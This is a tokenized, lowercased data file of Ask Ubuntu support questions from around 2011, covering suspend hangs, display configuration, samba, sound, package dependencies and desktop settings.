79054	how to stop ubuntu machine from becoming vegetative	i have a ubuntu server machine running 11.10 ( not server edition ) and sometimes when i do not do anything on the screen for a while , but i still use the services hosted on it from somewhere else on the local network , the machine suddenly goes into a coma . when i say a coma , i mean that the power light is on , the usb devices and cd drive have power and the fan is spinning , but the cpu light does not flash at all and it is not reachable over wired or wireless network , and the usb mouse and keyboard fail to wake it up . it is an `` hp compaq dc-7700 small form factor '' with an intel pentium d 3 ghz dual core cpu and intel incorporated graphics chip .
79057	xorg.conf does n't work in 11.10	i have a xorg.conf that works in ubuntu 9.10 . the xorg.conf adds a new modeline and setup dual monitors . last week , i updated to lubuntu 11.10 , and sadly found that the same xorg.conf does n't work anymore . to be more precisely , i did see the wallpaper showed in the correct resolution in the beginning , but then my first monitor , dell 2007fp , turned black . i checked with xrandr -q , and found that the new modeline does n't exist . i also tested the same xorg.conf in debian 6.03 , no problem at all . my guest is that the new lubuntu adds some kind of screen auto detection , and this clears the setting in xorg.conf , and .xprofile . is it possible to turn off the auto detection process ? my system is ibm t42 with ati rv250 chipset . the dell 2007fp has a native resolution 1600x1200 .
79059	how to switch packages to different repository ?	i installed gnome-shell from a 3rd party repository a while ago , but now it 's in the official repository . how do i switch it and all it 's dependencies to the official repository ? i tried removing the other ppa and apt-get clean & & apt-get update & & apt-get upgrade , but it does n't seem to detect any change . what do i do ?
79062	where 'd all my memory go ?	after using the laptop for several days without rebooting , i start to get into awful swapping problems ( combined with very poor responsiveness during io operations , swapping 10mb could mean that the desktop is unresponsivel for 5s , but 200mb at once will mean that it is completely unresponsive for several minutes straight while it grinds the disk ) . with all interface-apps shut down , the system monitor is reporting that over half of my 4gb is being used on something . what exactly , though ? system monitor , when showing 'all processes ' , does not list enough to add up to 2gb . screenshots - memory used , processes visible .
79063	how do you find the directory of a command ?	for example the following are the same # /usr/bin/php updatedatabase.php # php updatedatabase.php but how would i infer the location of the php command to be in /usr/bin ?
79072	marlin , ubuntu 11.10 and dropbox ( and ubuntu one ) plugins	i have installed marlin the elementary os file manager in my system but i do n't see any dropbox support for it by default , is it available ? how can i install it ?
79076	unable to log in due to freeze , occasional error message	i 'm new to ubuntu . and i have some problems now . i downloaded ubuntu 11.10 and burned it onto a cd . then i load it in my conputer , it 's easy . but when i finished those and restarted the computer , the problem comes : after i choose to log in the ubuntu system , the screen stays in pink , and it ca n't jump into ( about 30 min ) , and then i have no choices but to press ctrl+alt+del to reboot . another time i choose ubuntu to log in , it shows on the screen that `` busybox v1.18.4 ... ... built-in shell ... ... initramfs '' . however the live cd works very well . whatâs more , there is a windows 7 partition on the hard drive . ( windows 7 is also okay . ) but i leave more than 20gb on the hard drive to ubuntu . when i installed ubuntu , i only made two partitions ( swap and / ) . i donât know where the problems happened and how to deal with them . and i hope someone can help me out with the troubles .
79078	how to restart samba server ?	sorry this is a little embarassing but i 'm trying to set up my own server for the first time . i found great tutorial online . http : //www.intac.net/build-your-own-server/ i 'm stuck at the 2nd to last line of step 4 . apparently there is no samba directory in init.d . why is n't there a samba directory in init.d ? would the following work ? # sudo restart smbd # sudo restart nmdb
79080	libreoffice writer is missing its icon . where should i put a replacement ?	the other libreoffice programs all have their icons in place but i get the 'blank icon ' icon in unity 's launcher . any idea of the directory i should place a replacement icon or how i can get it back ? i 've tried : sudo apt-get purge libreoffice* & & sudo apt-get install libreoffice-writer but it still shows up blank .
79081	how will deja-dup operates when backing up to an external usb drive ?	i want to set up regular backups , and deja-dup seems like a nice tool . however , i want to put my backups on an extension usb drive that i have , not on a remote network location . naturally , this drive is not always connected . if i configure deja-dup to backup to a directory on this drive ( e.g . /media/extention/backup ) , what would happen ? will it prompt me to connect the drive when it is missing ( the desired behavior ) , or just fail silently ? is there some way to tweak it to do so ? i can roll my own cron-based backup script that checks if this drive is mounted , but i would really prefer to use an existing , integrated tool .
79086	remove partition for failed installation	i tried installing ubuntu alongside windows 7 installing ubuntu alongside windows and i failed so i decided to go with wubi again . after installing it , i noticed a separate hard disk . i investigated and found out that this hard disk is actually for the failed installation . i do n't know where to find it inside the windows system . can anyone please teach me how to remove the 'failed ' hard disk . here 's a screenshot the left side is the current filesystem . the right side on the other hand is the 'failed ' harddisk . i verified that it is the failed one because the wubi installation will provide a 'host ' folder for the current partition it is currently installed . i tried looking for the 'failed ' one using the windows ' command-line but i do n't know where to look for the 'failed ' disk . ( i used the cmd coz i do n't want root.disk to mysteriously disappear again . ) see http : //ubuntu-with-wubi.blogspot.com/2011/01/mystery-of-disappearing-rootdisk.html
79089	minimal ubuntu remastering	i was trying to remaster an ubuntu mini remix using the tool called `` customizer '' . my goal is to create a version with a gui capable of networking too . i do n't like all the tomboy notes , evolution and unity stuff that natty come with . http : //www.ubuntu-mini-remix.org/ http : //u-customizer.sourceforge.net/ the packages i installed are just xorg and gnome-desktop-environment . apt-get -- no-install-recommends xorg gnome-desktop-environment well it worked quite well . i just want to ask if there are any minimum packages other that the two mentioned above ? the lubuntu-desktop is great too but i want gnome more cos it has a wider community ( imo ) . please do n't refer me to lfs . i 'm still too noob for that .
79093	why is ubuntu one slow to sync in 11.10 , either backup or any sub-folder contents ?	i have been trying to sync my documents folder of 1.4gb , it still has n't worked and it has been syncing for a month . the top level syncs , files and folders in the document folders , but contents of sub-folders just hang . ( gave up and stopped syncing this folder ) however , i have tried using the backup facility in 11.10 , to backup to ubuntu one ... . i upgraded my hdd space in ubuntu one . it has been going now for 24hours-ish and only backed up what looks like a couple of percent . ( by the way what an excellent idea to backup to ubuntu one , if only we could get it to actually work ! : -o ) the odd thing is i can sync to drop box within hours , rather than months . this is bad , and has been an issue since ubuntu one 's release . i have reported this problem and there were promises in later releases this would be fixed , but it has n't . canonical can not help either ... i posted on several blogs , a lot of people have the same problem but no fixes . so do i use dropbox or another service , until it is sorted , as ubuntu does not seem to see this as an issue , i think a fix will be a long time in coming . ( however , i love the potential of ubuntu one and the integration with the os ) yes my internet speeds are fine , etc ... : - ) no firewall ( sudo ufw status : status : inactive ) , no proxy , etc nb : i have raised this as a separate question to others posted here , because my question relates to ubuntu 11.10 , though i have commented elsewhere for help . plus my question also relates to deja-dup backup to ubuntu one . thanks
79100	how to open a remote file ( ssh ) with my local emacs ?	i use ssh to connect to a remote machine where a file is . once the connection is established , if i run emacs the_file in the terminal , instead of launching my local emacs , it opens an editor inside the terminal which is very modest ... does anyone know how to open this file in a normal emacs session ?
79102	how to select which account is logged in at system startup , or none ?	i 'm helping out some friends with a tiny hospitality business where one desktop computer has some files used by the business in one account `` hotel '' but it 's mostly used by guests for browsing the web in another account `` guest '' . it 's low security , we 're not worried about hacking or anything . but we do n't want people accidentally moving our files or anything either . but the system always boots into the `` hotel '' account without asking for a password , even though the account has a password . we want it to boot into the `` guest '' account . i know a bit about computers generally and linux but not much about ubuntu and the ever-changing graphical environment the linuxes are going through these days . we 've looked through the obvious settings/preferences/options and i 've done some googling . i know this should be obvious easy stuff but i ca n't find it . ( we 're running 10.04 lts on a generic aging intel box . )
79107	how to run a script at startup ?	i want to start a java application at start up . i added the script file in init.d and the process got started . but the owner of the process is root . so when the java process is trying to write a file in my home i am getting permission error . how can i start the process from the user scope rather than the root scope ?
79110	how can i assign custom icons to folders ?	how do i assign custom icons to folders , as well as the default folders desktop , downloads , music , etc. ? i know that one way is to assign the properties of folders , but i want to assign icons in the same way that are assigned the default folders , so the custom icons will also appear in the nautilus bookmarks . i 've also seen this question > > custom icon in `` places '' menu < < , but that is not what i seek . update my main intention is this : i want the markers to display custom icons like the dolphin . i know it 's possible , because the folder `` desktop '' , `` documents '' , `` music '' has its own custom icons in bookmarks . how ?
79114	i do n't have permission for anything ! please help	running ubuntu 11.10 in gnome classic , i just changed it to make gnome classic the auto login choice and now i can not delete files , save files , or anything . i tried using the command : sudo chown -r user : user /home/user only to get this response ... . chown : can not access `/home/user/.gvfs ' : permission denied any help would be greatly appreciated . this is only my 3rd day ever using linux
79117	what 's the best alternative to twinview so i can calibrate both my monitors independently ?	in advance of being in a position to properly calibrate my dual monitor set-up under ubuntu , i really need to move from using nvidia 's twinview to something else as twinview is seen as one single large monitor . from a colour calibration point of view this is not too useful as each monitor needs to be calibrated separately . does anyone have any good tips , experience or recommendations as to the best way to go about setting up dual monitors that will allow me to calibrate both my monitors independently using xinerama or another solution ? the gfx card i have is an nvidia fx580 if that helps .
79119	why ca n't skype hear me ?	since i upgraded to ubuntu 11.10 , skype ca n't seem to hear me any more . it 's not that it transmits poor quality sound , it 's just silence . i 've tried the echo123 service many times , and there 's nothing . i 've checked that my microphone settings are correct : sound recorder works fine , and skype running in a vm [ virtualmachine ] sort of works ( it can hear me , but the sound stutters - probably a vm issue ) . i 've checked the skype audio settings : all options are set to `` pulse audio '' , as always , and i 've tried with both auto-adjusting enabled and disabled , but no joy . i 've also tried using alsa-mixer to ensure the microphone is not muted , but all seems well . when a skype call is connected , the microphone volume appears in the audio menu in unity , so i presume skype is doing the right thing , whatever that is . skype has always worked for me , for years ( since 8.10 maybe ? ) . any ideas why it might be unhappy now ?
79120	not all updates can be installed ( missing packages )	i 'm running ubuntu 10.10 , and the update manager claims that not all updates can be installed . i ran sudo apt-get update & & sudo apt-get upgrade and got this : hit http : //archive.ubuntu.com maverick release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en_us hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/banshee-team/banshee-daily/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/banshee-team/banshee-daily/ubuntu/ maverick/main translation-en_us hit http : //archive.canonical.com maverick release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en_us hit http : //archive.ubuntu.com maverick-updates release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en ign http : //archive.canonical.com/ubuntu/ maverick/partner translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_us ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_us hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ maverick/main translation-en_us hit http : //ppa.launchpad.net maverick release ign http : //archive.canonical.com/ubuntu/ maverick/partner translation-en_us hit http : //ppa.launchpad.net maverick release hit http : //archive.ubuntu.com maverick-security release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en_us ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en_us hit http : //archive.ubuntu.com maverick release hit http : //archive.ubuntu.com maverick-updates release hit http : //archive.canonical.com maverick release hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //archive.ubuntu.com maverick-security release hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //archive.canonical.com maverick/partner i386 packages hit http : //archive.ubuntu.com maverick/main sources hit http : //archive.ubuntu.com maverick/universe sources hit http : //archive.ubuntu.com maverick/main i386 packages hit http : //archive.ubuntu.com maverick/universe i386 packages hit http : //archive.ubuntu.com maverick-updates/main sources hit http : //archive.ubuntu.com maverick-updates/universe sources hit http : //archive.ubuntu.com maverick-updates/main i386 packages hit http : //linux.dropbox.com maverick release.gpg ign http : //linux.dropbox.com/ubuntu/ maverick/main translation-en hit http : //archive.ubuntu.com maverick-updates/universe i386 packages ign http : //linux.dropbox.com/ubuntu/ maverick/main translation-en_us hit http : //linux.dropbox.com maverick release get:1 ftp : //ftp.berlios.de stable/ release.gpg hit http : //archive.ubuntu.com maverick-security/main sources hit http : //archive.ubuntu.com maverick-security/universe sources hit http : //linux.dropbox.com maverick/main i386 packages hit http : //extras.ubuntu.com maverick release.gpg ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_us hit http : //extras.ubuntu.com maverick release hit http : //archive.ubuntu.com maverick-security/main i386 packages hit http : //archive.ubuntu.com maverick-security/universe i386 packages hit http : //extras.ubuntu.com maverick/main sources ign ftp : //ftp.berlios.de stable/ release.gpg ign http : //downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt/ all/main translation-en hit http : //extras.ubuntu.com maverick/main i386 packages ign http : //downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt/ all/main translation-en_us get:2 ftp : //ftp.berlios.de/pub/yajhfc/repository/apt/ stable/ translation-en hit http : //downloads.sourceforge.net all release.gpg ign ftp : //ftp.berlios.de/pub/yajhfc/repository/apt/ stable/ translation-en get:3 ftp : //ftp.berlios.de/pub/yajhfc/repository/apt/ stable/ translation-en_us hit http : //downloads.sourceforge.net all release ign http : //downloads.sourceforge.net all/main i386 packages ign http : //downloads.sourceforge.net all/main i386 packages ign ftp : //ftp.berlios.de/pub/yajhfc/repository/apt/ stable/ translation-en_us get:4 ftp : //ftp.berlios.de stable/ release hit http : //downloads.sourceforge.net all/main i386 packages ign ftp : //ftp.berlios.de stable/ release get:5 ftp : //ftp.berlios.de stable/ packages ign ftp : //ftp.berlios.de stable/ packages get:6 ftp : //ftp.berlios.de stable/ packages ign ftp : //ftp.berlios.de stable/ packages get:7 ftp : //ftp.berlios.de stable/ packages err ftp : //ftp.berlios.de stable/ packages unable to fetch file , server said '/pub/yajhfc/repository/apt/stable/packages.gz : no such file or directory ' w : failed to fetch ftp : //ftp.berlios.de/pub/yajhfc/repository/apt/stable/packages.gz unable to fetch file , server said '/pub/yajhfc/repository/apt/stable/packages.gz : no such file or directory ' e : some index files failed to download , they have been ignored , or old ones used instead . i 'm using the main repository and have unchecked multiverse and restricted . how do i fix this ?
79124	how to activate usb speakers consistently	i have a pair of trust usb speakers . as these are external , i sought to use them with 11.10 . they are recognized by 'aplay -l ' and pulseaudio- i have selected them , but , have to reset the volume , every time i log on . also , i can receive only feedback and sound from apps and programs- like kaffeine or firefox- on this boosted volume- i can not get system sounds , like logon or logoff . i have tried the gnome-alsamixer install that used to work , to no effect . is their an app that i should be trying or is this feat impossible ? i have tried to delete all the files in .pulse and rebooting or just deletion of the entire .purge directory , as michael k suggested- neither works as the directory is automatically rewritten on reboot . [ i have found that any other soundcards ( of those tried- many ) will zero out all the options for a usb system . do not use a second soundcard during this setup ] ideas ? i executed the command : sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 sudo apt-get -y -- reinstall install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 killall pulseaudio rm -r ~/.pulse* sudo usermod -ag 'cat /etc/group | grep -e '^pulse : ' -e '^audio : ' -e '^pulse-access : ' -e '^pulse-rt : ' -e '^video : ' | awk -f : ' { print $ 1 } ' | tr '\n ' ' , ' | sed 's : , $ : :g'` `whoami` [ this command should be taken from their helppage , not mine , for certainty ] to totally reset and rejig my system ( from https : //help.ubuntu.com/community/soundtroubleshootingprocedure ) . this reloads all the defaults and then scans for audio devices . in a terminal , type alsamixer this should load a gui , allowing you to scan all channels . press f6 and look at the channel ( s ) available . if usb audio is set to channel 0 ( usually in brackets ) , then this will interfere with any inbuilt soundcards- even if they are disabled . as such , this usb must be set to another channel , say 1 . however these speakers can be tested , now , by selecting them , but , they will disappear on reboot now execute the command find /lib/modules/`uname -r` | grep snd this should give you a massive list of possible sound systems- look for snd-usb-audio *or somesuch , depending on your speakers* your inbuilt card is shown , too . even if you have disabled or do not have an inbuilt soundcard , linux will set up a virtual , 'ghost ' card , if necessary . this is always set to card 0 . now type sudo gedit /etc/module.d/alsa-base.conf and , at the bottom of the file , add the line option snd-usb-audio = 1 this should set your soundcard to channel 1 and not conflict with the default settings . reboot . now type cat /proc/asound/cards you will get something like cybermedia usb device 1 [ audio ] : usb-audio - usb audio c-media inc. usb audio at usb-0000:00:13.1-1 , full speed ======================================================================== it is always advisable , to now type in this teminal sudo cp /usr/share/sounds/ubuntu/stereo/* /usr/share/sounds/ this will copy your new alsa card to this directory , along with any default sounds and subdirectories . i found that the pulse frontend to alsa is faulty , especially in 64 bit systems- the system volume will reset to 100 % , whatever is . . looked up this pulse problem and was told to try enabling/disabling ( whichever works ) the flat-volumes option ( yes or no ) in /etc/pulse/daemon.conf . monkeying with this option is recommended , as it is disabled by default ( set to 'yes ' , if you have usb speakers ) . this allows the use of the sound preference sliders to be permanent . this appears to be a known bug . leave the editor . pav settings i found this advisable . ============= i mistakenly thought that while the speakers are usb , i must include the inbuilt soundcard , as a sound source . now i have working usb speakers but the volume sliders in sound preferences are reset , every time i log on . after an overnight reboot , to allow the alsa to catch up , i attain a new sound card > aplay -l card 0 : sb [ hda ati sb ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/usb card 0 is my inbu1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : audio [ usb audio ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 open the dash ( top left of screen and a circular icon ) and type pav select the pulseaudio volume controller and run it . and go to the configuration tab . you must set your inbuilt/internal card as input only- via this tab . now reboot immediately . usb card 0 is my inbuilt card . it is far easier to deal with a real card than a virtual one ( ubuntu needs some sort of soundcard and will create a 'ghost ' , virtual one if your mo'bo and pcis are bereft of one . to set the system volume , it is vital to use the pav and not system preferences . select this option , from the dash and set your volume/amplification ; click on the sliders to hear the set level . using the volume sliders in system preferences > sound or the sound icon is a base level method and will totally zero any changes to pav . do not use them . fyi adobe flash 10 does not work with 64-bit v 11.10- it may be necessary to install the v 11 , if your firefox flash goes away [ playing video , but , no sound or such ] or does not work , at all .
79130	interacting with a linux input kernel driver from userspace	i 'm developing a linux kernel driver for a multitouch device . right now i have already touch being injected to the linux kernel subsystem and it is working . the problem is that i also need to interact with the device to change settings an so on . while the kernel is grabbing the device i ca n't grab it in user space , so i need to find a way to interact with the kernel driver . my first driver test had some extra operations that i ca n't find on the current model i 'm using . it had open , close , read , write operatins that i could perform from user space . how can i do such things with input drivers ? is there any official way ? thanks in advance , with my best regards , nuno santos
79131	why does n't .mkv files play properly with ubuntu-restricted-extra ?	i am running ubuntu 10.04 with ubuntu-resticted-extra installed . when i play .mkv with the default player , totem it causes the player to stop suddenly without any warning after a random amount of time ! anybody else is having this problem ? is there any workaround other than installing vlc ? ? what i want to know is , is it a bug in gstreamer ? or i 'm the only one facing this issue !
79134	play youtube videos in totem movie player	whn i try to play youtube video in totem i get this error : no supported stream was found . you might need to allow more transport protocols or may otherwise be missing the right gstreamer rtsp extension plugin . i have all totem plugins installed including plugins for the totem media player gstreamer coded installer gstreamer extra plugins any idea ?
79137	installing pgadmin 3 for ubuntu 11.10 and postgresql 9.1	i 've installed pgadmin3 on a remote ubuntu client and succesfully connected to the postgres db using : sudo apt-get install pgadmin3 problem is that when connecting to the postgres 9.1 server it notifies me that i do n't have the latest pgadmin and some of the features might not work using this client . from reading the pgadmin site i should download the postgres binary at http : //www.enterprisedb.com/products/pgdownload.do but that 's only a installer bin . how can i install the pgadmin from that binary as the ubuntu one is not the latest ? alternatively , is there any other location where i can find the pgadmin binaries ?
79138	is there any ncurses archiver interface available ?	i am looking for a way to create archives on the commandline with some minimal ascii interface . could be for tar , zip or rar files , but should provide miniml ncurses ( or other ) `` fake '' graphical interface . i tried with midnight commander but could not find an entry in the menu to create an archive from selected files . also great would be to have an option `` archive and test '' or even better `` arcive and test and delete originals on success '' .
79146	installing on a sony vaio vpcz138gg	i long for linux and have been trying for the past 12 days to install ubuntu/linux mint on my laptop [ sony vaio vpc z138ggg with 256gb ssd hdd/8gb ram/nvidia geforce graphics card ] without success . ubuntu 10.04 lts 64 bit installed perfectly ( without touchpad support ) but on restart after commencing boot displays few lines and freezes . i have tried ubuntu 11.04 but bootloader grub does not install & remote help via teamviewer was not possible because of lib file errors . i have managed to install linux mint 11 32 bit on my desktop and with a friends help and have no problem with it . but i do hear there is problem always in installing linux onto sony vaio . i have tried installing linux mint 11 32bit & 64bit on my laptop without success ! could someone help ?
79150	how to remove bookmarks from the nautilus sidebar ?	i want to remove videos and music from the left side panel . but , i ca n't seem to find the option to do so . how do you do that ?
79152	build avahi without gui	i 'm running ubuntu jaunty on a plug computer which i only ever access via ssh . i want to update avahi on the device ( without gui ) and the only way ( that i know of ) to get the very latest version is to build from source . i 've downloaded 0.6.30 from the avahi site , but when i run ./configure i keep getting hassled for loads and loads of packages that i do n't think i need ( since i do n't want the gui ) . at first i just installed whatever package it complained about and then ran ./configure again but now it 's just getting silly ! even running with ./configure -- disable-qt3 -- disable-qt4 -- disable-gtk -- disable-dbus -- disable-mono -- disable-monodoc -- enable-core-docs i still get the error : configure : error : package requirements ( gtk+-3.0 ) were not met : no package 'gtk+-3.0 ' found which is bizarre because i specified the -- disable-gtk flag . so what 's going on here ? and how can i build avahi without all the unnecessary ( optional ) gui components ? there seems to be little -- if any -- documentation available on this .
79158	ldap tls does n't work even though gnutls-cli works	i 'm trying to set up ldap client access using tls . i 've added the certificates of my ca and both gnutls and openssl connect just fine to the ldap server . when i try ldapsearch though it still says tls : peer cert untrusted or revoked as said : connecting with gnutls-cli results in peer 's certificate is trusted . i 've set tls_cacertfile /etc/ssl/certs/ca-certificates in my ldap configuration and this is the same cacert file i use when i tried connecting with gnutls-cli and openssl . this rules out any source of error i 've found on this topic so far where can i go from here ? thanks edit : gnutls version is 2.8.6
79165	how to change folder icons visibility mode ?	i am using ubuntu 11.10 . the visibility mode of folder icons in my main drives are getting changed without my access on them . sometimes they are showing as a folders and some times they are visible as a text files , but they are actually folders . can i know where to change the settings for these ? please rectify my problem .
79168	crm application for ubuntu	i am looking for crm application to manage an it workshop running ubuntu . i have a medium size workshop and i am looking for a crm application i can use to manage jobs , appointments and track work being done by my staff . does anyone know of an application that will do this ? thanks .
79171	install matlab with wine	i have been moving from windows to ubuntu recently . i have both windows 7 and matlab for windows license keys . my question is , is it possible to use wine to install matlab ( for windows ) ? will the performance of matlab being affected ? except wine , dual-boot , and purchase a new matlab for linux license key , what other options do i have ? update : i just searched for virtual box , will it be a good alternative ? update : after trying with virtualbox , i believe it will not be a good option , because it only run with the ram allocated for it . seems like i can only purchase a new license , if i do n't want to dual-boot , which is quite not convenient .
79173	hdmi & display port stopped work on 11.10	after upgraded two laptops to 11.10 , hdmi and display ports stopped to work . symptoms on each ( btw . it used to work with 11.04 on both ) : laptop dell inspiron 1525 ( hdmi , intel gmx 3100 ) : after hdmi cable is plugged in , screen is corrupted ( no panel , no icons ) , system is unresponsive , tv set receives some signal , but only blue screen and some regular ticks can be heard . unplugging the cable system recovers . no logs were checked . thinkpad w510 ( displayport , nvidia ) . simple `` screens '' utility does not recognizes tv set , but this is something to do with the differences between nvidia driver api and the one expected from the utility , as far i could spot on the net . however , using nvidia-settings , tv is recognized , but can not be enabled and used . beside that , touch pad freezes after hdmi2displayport connector is plugged in the laptop ( not immediately , but after few seconds - probably after some handshake with the tv set crashes ) . it is strange that no such bug reports can be found on the net . so , i guess it is something wrong on our laptops only , but would appreciate some hints ( i.e . any known changes recently related to hdmi , display port , x-windows , kernel ... wherever i should take a look and fix the issue ) .
79174	how to get back refresh button in nautilus	i really miss the refresh button in nautilus , which has been removed in ubuntu 11.10 . i found it very useful . is there a way to get it back . : d
79180	what ebook reading devices work well without windows or wine ?	i want to purchase an ebook reader device and ebooks . i do n't use windows , mac os or wine . most ebooks sold today are encumbered with drm . therefore , i need a workflow to buy and read drm ebooks either using only the device or using ubuntu . the three popular types of drm in use today are : adobe digital editions ( ade ) used with the epub format on multiple devices with books from several stores . this software requires windows , mac or android . sony reader and b & n nook apps appear to be variants of ade . apple itunes . this software requires windows or mac ( or an idevice ) . amazon kindle . this requires , a kindle , kindle software ( such as on androids ) or kindle cloud ( through web browser ) . this leaves me with two option an android device with a drm app ( kindle or ade ) a kindle both can directly communicate with a store and handle the drm themselves , a computer is not required . to my knowledge there is no android device with an eink display . other devices are not an option because although the support epubs with ade drm , it appears that a computer with the ade software or some variant thereof is required ( according google ebooks , b & n , sony ) while many readers have wifi or 3g , no manufacturer states that you can buy drm books without going through a computer with the ade software . this brings me to the conclusion that amazon 's kindle is the only eink device that will work for me . can you name an alternative ?
79186	why is n't firefox 8.0 available as an update in the update manager ?	so recently i 've read that firefox 8.0 is out , thought of updating , opened the update manager , refreshed the sources , but there was no uodate . is there a particular reason for that ?
79192	php change uploaded file owner	i installed php5 , mysql and apache2 without any error . everything is working fine . apache2 's root directory is /var/www ( permission is 775 ) . problem is when i upload a file using php code it change the owner of uploaded file ( as root ) . so i can not read this file from another code without changing owner of file manually . is there is anyway to solve this problem ? should i add user to php group ( how ) ? thanks in advance .
79195	where do i have to paste an `` xinput '' command so that it executes it when gnome is started ?	on my thinkpad i need to execute something like this in the terminal : xinput set-int-prop `` tpps/2 ibm trackpoint '' `` evdev middle button emulation '' 8 1 so that my the 2 buttons on my touchpad emulate the middle mouse click . now i need this line to be executed each time i start gnome or x or whatever , so that it `` just works '' . i tried ~/.xsession or ~/.bashrc but to no avail . should i put it in gnome start scripts or in /etc/x somewhere ? i 'm using ubuntu 11.10 .
79201	upload more than one file using the web interface	where i work i can not install the ubuntu one client in windows ( you need adminstrator rights ) . but using the web interface , you have to select one file at a time , so if you want to upload 100 small files , well ... that 's not gon na work . it 's just a suggestion ...
79202	how to add from & to in reply all in thunderbird ?	i am using thunderbird as my email client . when i click reply all in my email it does n't shows from id , to id , cc , date & time . i just want to enable this from to cc date & time in reply all . how to do this ?
79208	how can i use the nvidia optimus graphic card as primary card ?	i 'm checking around but i ca n't find an answer . i have an eeepc 1215n with nvidia optimus ( intel+nvidia ) graphic card . i 'm not really interested in battery duration but more in performances . ok , do n't tell me to try bumblebee and vgaswitcheroo and all : ) i did and have bumblebee installed and working . but i need a dual monitor configuration and gnome-shell+intel graphic card does n't do the job . so the idea is to run the whole gnome-session on the nvidia graphic card but ... how ? !
79218	launching libreoffice files - unusual window behaviour	ubuntu 11.10 unity . if i launch libreoffice files ( ods , odt , odp ) with a double click in their home folders they launch with the appropriate application ( calc , writer , impress ) however the application windows do not display the usual close , minimize , restore buttons in the left hand corner . there is just a blank space where they should be . in the unity launcher on the left there is not the expected white arrow next to the launcher icon and the open app is not seen by the alt+tab keystroke when you have multiple windows open . for example : if you have an app open in this way and say firefox , if you minimize firefox you are only left with the desktop and you have no way to locate the open libreoffice app . clicking the app 's icon in the launcher simply opens another instance . a messy workaround is to click [ firefox ] to a restored window and the libreoffice app can be seen behind it allowing a mouse click to bring it forward . if i open the libreoffice app from the launcher and then open a file from its menu , it all behaves as expected . i do n't find this as convenient ; anyone know how to fix the bad behaviour ?
79219	ca n't install libglib2.0-dev	since handbrake ca n't be installed in oneiric , i decided to try and build it from source instead . the build is interrupted because it complains glib is not installed , so i thought i better install the glib development package . but i cant : $ sudo aptitude install -v libglib2.0-dev the following new packages will be installed : libglib2.0-dev { b } [ 2.30.0-0ubuntu4 ] 0 packages upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 1 775 kb of archives . after unpacking 8 831 kb will be used . the following packages have unmet dependencies : libglib2.0-dev : depends : libglib2.0-0 ( = 2.30.0-0ubuntu4 ) but 2.31.0-0ubuntu1~oneiric1 is installed . depends : libglib2.0-bin ( = 2.30.0-0ubuntu4 ) but 2.31.0-0ubuntu1~oneiric1 is installed . internal error : the solver install ( libglib2.0-bin 2.30.0-0ubuntu4 < libglib2.0-dev 2.30.0-0ubuntu4 - > { libglib2.0-bin 2.30.0-0ubuntu4 libglib2.0-bin 2.30.0-0ubuntu4 } > ) of a supposedly unresolved dependency is already installed in step 237 aptitude the suggest a solution that involves removing basically all libraries , including libc . how do i install the glib development package ? edit $ apt-cache policy libglib2.0-0 libglib2.0-0 : installed : 2.31.0-0ubuntu1~oneiric1 candidate : 2.31.0-0ubuntu1~oneiric1 version table : *** 2.31.0-0ubuntu1~oneiric1 0 100 /var/lib/dpkg/status 2.30.0-0ubuntu4 0 500 http : //se.archive.ubuntu.com/ubuntu/ oneiric/main amd64 packages
79221	a terminal emulator for ex-windows users	there are several things i would like to be better in ubuntu terminal emulator . coloring , like in the source code copy and paste keyboard shortcuts that i used all the time in windows : ctrl-c and ctrl-v ( most of people here in ubuntu use ctrl+c and ctrl+v keyboard shortcuts to copy and paste everywhere except the terminal ! i think it 's annoying for newcomers , and i do n't worry about historical reasons ) a feature to save all the output to log file update : can the terminal be a powerful feature-full user-friendly tool like a modern ide ? the linux user can spend 30 % of time in the terminal . programmers no longer code in a notepad . can i see the history pane ? suggestions ? directory pane ? commands list ? search for words in an output ? contextual behavior ? `` search in google '' for a mouse right-click . tips and tricks learning ? time is money ! please , people , give me a link to the 21st - century terminal .
